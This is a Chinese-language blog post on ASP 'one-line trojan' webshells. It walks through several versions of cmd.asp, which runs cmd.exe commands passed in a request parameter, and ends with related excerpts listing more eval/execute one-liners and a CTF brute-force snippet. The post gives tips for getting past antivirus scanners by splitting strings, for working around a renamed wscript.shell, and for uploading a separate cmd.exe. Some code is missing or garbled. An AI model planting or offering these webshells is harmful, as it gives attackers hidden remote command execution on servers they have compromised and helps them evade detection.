關於一句話木馬

2021-04-06 23:40:22 字數 1456 閱讀 3299

這裡的asp後門不指像那些一句話木馬、砍客、冰狐之類的b/s型的,只指像cmd.asp或2005a.asp的。

第乙個,來看zzzeva免fso的cmd.asp

**如下:

是不是覺得有點長了?在注入時寫有點不好寫。那來改一下。

第二個,更改zzzeva免fso的cmd.asp

**如下:

<%response.write server.createobject("wscript.shell").exec("cmd.exe /c

"&request("cmd")).stdout.readall%>

用法是xx.asp?cmd=net user

這樣是為了得到結果排得方便,其實如果不為美觀,還可以更短,那來第三個

第三個,縮短的cmd.asp

<%response.write server.createobject("wscript.shell").exec("cmd.exe /c

"&request("cmd")).stdout.readall%>

這裡用了response.write,變數用了cmd。為什麼不更短呢?

第四個,更短的cmd.asp

<%=server.createobject("wscript.shell").exec("cmd.exe /c

"&request("c")).stdout.readall%>

好像這就是最短的了。除了短,我們還要在別的地方下功夫。

第五個,wscript.shell被改名怎麼辦?

**:<%=kk.exec("cmd /c "+request("cmd")).stdout.readall%>

當然,classid值在不同系統下有所不同。這個要自行更改

第六個,被一些殺asp木馬的軟體檢測出來怎麼辦?

把變數拆開呀。**:

<%=server.createobject("ws"+"cript.shell").exec("cmd.exe /c

"&request("c")).stdout.readall%>

或<%=server.createobject("ws"&"cript.shell").exec("cmd.exe /c

"&request("c")).stdout.readall%>

這裡**引號裡的東東都可以隨便拆的,像還可以拆成

<%=server.createobject("ws"&"cript.shell").exec("c"&"md.exe /c

"&request("c")).stdout.readall%>

第7個,cmd.exe不讓呼叫怎麼辦?

這個你自己上傳乙個cmd.exe,放在乙個可以呼叫的目錄下,**更改如下:

<%=server.createobject("wscript.shell").exec("e:/aspx/cmd.exe /c

"&request("c")).stdout.readall%>

一句話木馬

一句話木馬短小精悍,而且功能強大,隱蔽性非常好,在入侵中始終扮演著強大的作用。一句話木馬 服務端 是用於本地的html提交指令碼木馬檔案 就是我們要用來插入到asp檔案中的asp語句,不僅僅是以asp為字尾的資料庫檔案 該語句將回為觸發,接收入侵者通過客戶端提交的資料,執行並完成相應的操作,服務端的...

webshell一句話木馬

asp一句話木馬 eval request sb execute request sb execute request sb execute request sb loop loop execute request sb eval request chr 35 executeglobal reque...

CTF PHP一句話木馬

他是提示讓你輸入乙個4位數的密碼 我們使用burp來自動生成乙個所有以4位數組成的密碼 經過一段時間的爆破發現他的返回值都為192個位元組,無法區別正確的密碼。尋求大佬的求助得知,遇到這種情況時,在burp的intruder 選項中有個grep extract 模組可以提取錯誤的返回包,從而得知正確...